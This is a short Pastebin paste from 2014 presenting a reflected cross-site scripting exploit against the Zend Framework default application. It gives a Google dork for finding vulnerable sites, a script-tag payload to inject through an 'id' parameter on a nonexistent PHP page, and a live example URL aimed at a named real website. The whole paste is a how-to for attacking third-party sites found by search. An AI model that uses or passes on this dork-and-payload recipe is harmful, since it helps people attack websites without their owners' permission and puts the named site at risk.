Advertisement
M3GAFAB

Zend Framework XSS Bug

Jan 28th, 2014
436
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.17 KB | None | 0 0
  1.  
  2. #########################################################################################
  3. # XSS Exploit .[It may be patched in most of the websites]
  4. # Zend Framework Default Application XSS
  5. # Author : IllyrianW & M3GAFAB
  6. ##########################################################################################
  7.  
  8. -------------------------------------------------------------------------------------------------------
  9. " Zend Framework Default Application "
  10.  
  11.  
  12. Google d0rK : intitle:"Zend Framework Default Application"
  13.  
  14.  
  15. Find a website.
  16.  
  17. Zend Framework Default Application XSS Exploit it shows the 404 error so type an unexist PHP file like
  18. acruex.php and add
  19. id=<script>alert("TEXT HERE ");</script>
  20.  
  21. Example site.com/cm.php?id=<script>alert("TEXT HERE");</script>
  22.  
  23. Example sites:
  24. http://www.ecoton.kz/ru/gallery/cm.php?id=<script>alert("AcruexSecurity");</script>
  25.  
  26. -------------------------------------------------------------------------------------------------
  27. ####################################################################################################
  28. ####################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement